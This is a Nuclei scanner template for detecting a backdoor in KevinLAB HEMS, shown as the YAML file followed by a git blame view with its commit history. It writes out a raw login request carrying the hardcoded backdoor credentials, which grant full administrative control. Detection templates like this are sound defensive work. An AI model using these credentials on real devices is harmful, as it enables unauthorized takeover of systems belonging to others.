nuclei-templates/http/vulnerabilities/backdoor/kevinlab-hems-backdoor.yaml

id: kevinlab-hems-backdoor

info:
  name: KevinLAB HEMS - Backdoor Detection
  author: gy741
  severity: critical
  description: |
    KevinLAB HEMS has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
  metadata:
    max-request: 1
  tags: kevinlab,default-login,backdoor

http:
  - raw:
      - |
        POST /dashboard/proc.php?type=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Accept-Encoding: gzip, deflate
        Connection: close

        userid=kevinlab&userpass=kevin003

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<meta http-equiv="refresh" content="0; url=/"></meta>'

      - type: word
        words:
          - '<script> alert'
        negative: true

      - type: word
        part: header
        words:
          - 'PHPSESSID'

      - type: status
        status:
          - 200

# digest: 4a0a004730450220267fec77abb09bfde643496837dacebb4dff78eb576dc22b0e60b85d631e4ab20221009da99a302a2eb9b9cf0d8f5bbf4f9c66f185a9387852592a6f91596f48eb0bf1:922c64590222798bb761d5b6d8e72950
Create kevinlab-hems-backdoor.yaml The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-26 17:48:31 +00:00			`id: kevinlab-hems-backdoor`

			`info:`
Enhancement: vulnerabilities/other/kevinlab-hems-backdoor.yaml by mp 2022-05-30 17:22:21 +00:00			`name: KevinLAB HEMS - Backdoor Detection`
Create kevinlab-hems-backdoor.yaml The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-26 17:48:31 +00:00			`author: gy741`
			`severity: critical`
Update kevinlab-hems-backdoor.yaml 2022-05-31 08:58:02 +00:00			`description: \|`
			KevinLAB HEMS has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: kevinlab,default-login,backdoor`
Create kevinlab-hems-backdoor.yaml The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-26 17:48:31 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create kevinlab-hems-backdoor.yaml The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-07-26 17:48:31 +00:00			`- raw:`
			`- \|`
			`POST /dashboard/proc.php?type=login HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`
			`Accept-Encoding: gzip, deflate`
			`Connection: close`

			`userid=kevinlab&userpass=kevin003`

			`matchers-condition: and`
			`matchers:`
minor update 2021-08-07 18:50:56 +00:00			`- type: word`
Update kevinlab-hems-backdoor.yaml 2022-05-31 08:58:02 +00:00			`part: body`
minor update 2021-08-07 18:50:56 +00:00			`words:`
			`- '<meta http-equiv="refresh" content="0; url=/"></meta>'`

			`- type: word`
			`words:`
			`- '<script> alert'`
Additional matcher 2021-08-07 18:52:55 +00:00			`negative: true`

			`- type: word`
Update kevinlab-hems-backdoor.yaml 2022-05-31 08:58:02 +00:00			`part: header`
Additional matcher 2021-08-07 18:52:55 +00:00			`words:`
			`- 'PHPSESSID'`
Update kevinlab-hems-backdoor.yaml 2022-05-31 08:58:02 +00:00
			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a004730450220267fec77abb09bfde643496837dacebb4dff78eb576dc22b0e60b85d631e4ab20221009da99a302a2eb9b9cf0d8f5bbf4f9c66f185a9387852592a6f91596f48eb0bf1:922c64590222798bb761d5b6d8e72950`